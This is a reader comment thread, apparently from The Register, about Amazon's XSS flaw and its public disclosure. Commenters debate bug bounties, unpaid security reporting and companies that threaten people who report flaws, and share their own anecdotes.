I helped Amazon.com find an XSS hole and all I got was this lousy t-shirt Amazon has patched dangerous cross-site scripting (XSS) vulnerability in its website that exposed accounts to hijacking. A Brazilian hacker using the handle @BruteLogic published the then-zero-day flaw to XSSposed.org Saturday without tipping off the book giant. Amazon swatted the flaws two days later. The time between …
"They will be wishing they gave more than a t shirt next time when somebody decides not to tell them because its not even worth their time."
My understanding from the article is that Amazon was not told of this flaw, but instead it was posted elsewhere on the web and subsequently brought to their attention. I suppose the next person that discovers a vulnerability could just exploit it and not tell anyone, but that happens everyday anyway...
"Either way, publishing it openly is the wrong thing to do. EoS."
Pfft.
I accidentally discovered a flaw on Amazon's site (the UK site, but it's possible the same thing applied to other sites) some years back that could result in duplicated/forked accounts with different access details. I couldn't cause it to happen again, so it might have already been fixed (just as it might be that I couldn't work out what caused it in the first place).
Therefore, since I wasn't aware if they had become aware of the problem and definitely fixed it - and because there may have been other people out there with similarly forked accounts (who, IMO, they should have notified if that was the case) I decided to contact them.
Amazon - or the Amazon twit I communicated with - really, really weren't in the slightest bit interested, and even shifted the blame onto me.
I have lost count of the number of companies - JustEat springs to mind - where I have been forced to use their sucky interface (believe me, sucky is being kind in this case - especially seeing as it replaced the infinitely superior Meal2Go) commented on such, and received an invitation to "discuss it with our development team".
Or in other words do my job (and theirs) for free. No thanks you tight gits - you should have spent the money in the first place.
Quick show of hands. How many El Reggers have been invited to work for free after pointing out faults and flaws in company websites ?
"Quick show of hands. How many El Reggers have been invited to work for free after pointing out faults and flaws in company websites?"
I'll go you one better. After declining their offer to discuss a security issue I discovered with a site's dev guys, they threatened legal action. Basically "help us fix it for free or we'll have the cops nab you for hacking".
I politely declined that little offer too.
This post has been deleted by its author
It's not just in the IT industry that people are put upon to work for free
However, I do think it is more "expected" than any other, especially within (and just beyond) a circle of friends.
I have lost count of the number of weekends I have wasted fixing a "little problem" with a friend's computer. I have also lost count of the number of shocked faces I have seen when I suggested I should be paid for the work. "But all you need to do is push a few buttons" seems to be the thought process.
Things are different when you look at someone like a band (a mate's band charged me, albeit at mates rates, for singing at my engagement do, and I was happy to pay) or a plumber (they will generally diagnose the issue for free but charge, at mates rates again, for doing the actual work, which I am happy to pay). These are expected. They are doing "real work", not just playing with a computer.
I can't help thinking Amazon has plenty of resources to find these bugs themselves if they really wanted, or even debug their code sufficiently so they're not there in the first place.
The Altruism argument falls down because Amazon are a pretty massive company and stood to lose more from exploitation than they would have done by paying a bug bounty. If this bug is present then it's likely not the only one which shows their own debug procedures are inadequate.
Bug bounties seems to be a pretty established MO now. Bug finder gets a tidy reward for their work to prove the bug existence (and also to avoid them exploiting it) while $MEGACORP gets detailed information to fix bug before someone does exploit it with all sorts of reputational damage.
If you're really keen to debug Amazon's codebase for free in your spare time do feel free!
I can't help thinking Amazon has plenty of resources to find these bugs themselves if they really wanted, or even debug their code sufficiently so they're not there in the first place.
You are implying that they ought to have a team that actually tests for security holes as part of the development team. Adding security to development? What is wrong with you?! Next, you will say they ought to do user acceptance testing.
I don't consider "doing free technical work to save someone else's CORPORATION from FINANCIAL consequences" as altruism, you know.
Technological altruism is helping your neighbor with their dodgy connection or reporting a flaw in a medical device that could harm a PERSON. If a company wants help with their bottom line they better damn pay what it's worth.
I come across security bugs like this all the time on smaller sites, some massive like javascript sanitation of input and nothing else! But usually I just move on as there is no benefit to me in telling them. In fact all I will get at best is hassle dealing with people who don't care, at worst a possible criminal complaint for probing their system.
Want to make some money?
Setup a site where people can log these issues against specific sites to act as a middle man. The site will then email the company on your behalf and offer the info at a price. The middle man obviously will take a cut.
List on your site the web sites exploits have been found for and what type it is, but obviously no details, that should get them paying!
This post has been deleted by its author
This...so much this.
I worked for a financial institution who had contracted for a local alarm company to install a system at a new branch. The system used an RF transmitter operating in the licensed 'business-band' frequencies, around 450mhz. I insisted (per policy) that the company configure a secondary connection via IP or POTS. They went on and on about how secure and reliable their RF connection was and refused to install a secondary communcation link. I said I can google their frequency(and showed them the FCC ULS site) then buy a jammer off ebay that will jam their frequency and prevent any communication. This was enough to get the installer to put in a secondary connection.
I received a call from the owner of the company the next day. He first confirmed that what I said was true, then threatened to call law enforcement and report me 'if his system so much as hiccups'. Then he hung up on me.
We demanded he remove all of his equipment and terminated all relationships with the company.
This post has been deleted by its author
Big companies lobby the government(s) to tighten up the law so that it becomes a criminal offence not to disclose bugs you find in websites to the owners. That way they don't have to spend any money on decent development and can use the threat of prison to enforce compliance.
A little bit like it being a criminal offence (in the UK) not to notify police if Uncle Ahmed has popped off to Syria.
Bear in mind there's *already* a delicate line to tread between asking for payment to divulge details of a bug and blackmail.
This post has been deleted by its author
Nice. I discovered an Atlanta Motel was showing the padlock in (improperly) IE on a SSL fail in payment transfer. I called to warn them and was threatened for 'hacking' (and I was booking my room while in Mexico). I replied with a fax cancellation and informed them I would be contacting the GA State Attorneys Office faster than they could call Atlanta PD.
"Is altruism dead and forgotten?"
No, but when dealing with a multi-billion dollar company, I don't see the need for being altruistic. They can a) pay at least a token $100 or whatever. And b) have a security contact, I would not go through layers of tech support to report a security flaw (not saying they don't already do this, maybe they do.)
Also, here's a nasty flaw. I'm reporting it here, because Google's support interface is damn near useless, and when I reported it on their support forum the response was a) someone snarkily putting "my friend" in quotation marks, implying that it was my computer problems and not his. b) Saying I got scammed (again ignoring it was my friend -- and nobody got scammed.)
So he wanted to transfer paid Android games from his old Google account to his new one. (Why he didn't just put the old account in his new Android device I don't know.) He got all flustered and finally decided to call Google (which I didn't think would help but didn't think it could hurt either). I Google'd the phone number, 1 (650) 253-0000. I Googled *that* number to make sure it was actually Google's (and not some scam paid listing or something), and it is. My friend dialed it -- and instead of going to Google, it went to a scammy Indian call center! They dicked around for like 20 minutes pretending to transfer account info, then wanted to bill him $120. He handed the phone to me and I was like "Is this someone at Google? If so, you already have his credit card info..." "Oh, no you've got to go to this site and..." "No, if you're google as you claim you already have his info." I hadn't the phone back to him and he hung up. Don't try to scam someone out of their card info by impersonating someone that already has that info 8-). NOBODY in the Google forum addressed "How did Google's main phone number get redirected to someone else?" instead making snarky remarks. They have NO forum for security issues, and no E-Mail contacts whatsoever to contact someone like a professional. Given this experience I would NEVER report a flaw to Google, I would report flaws publicly (especially given the only option to reach Google is ALREADY a public forum!)
The Register 
Biting the hand that feeds IT
Copyright. All rights reserved © 1998–2024
